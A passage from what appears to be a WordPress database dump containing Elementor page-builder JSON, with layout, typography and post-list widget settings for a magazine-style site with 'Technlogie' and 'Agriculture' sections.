r\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1197,437,'_elementor_version','0.4'),(1198,437,'_elementor_css','a:3:{s:4:\"time\";i:1508878041;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1200,438,'_elementor_edit_mode','builder'),(1201,438,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizonta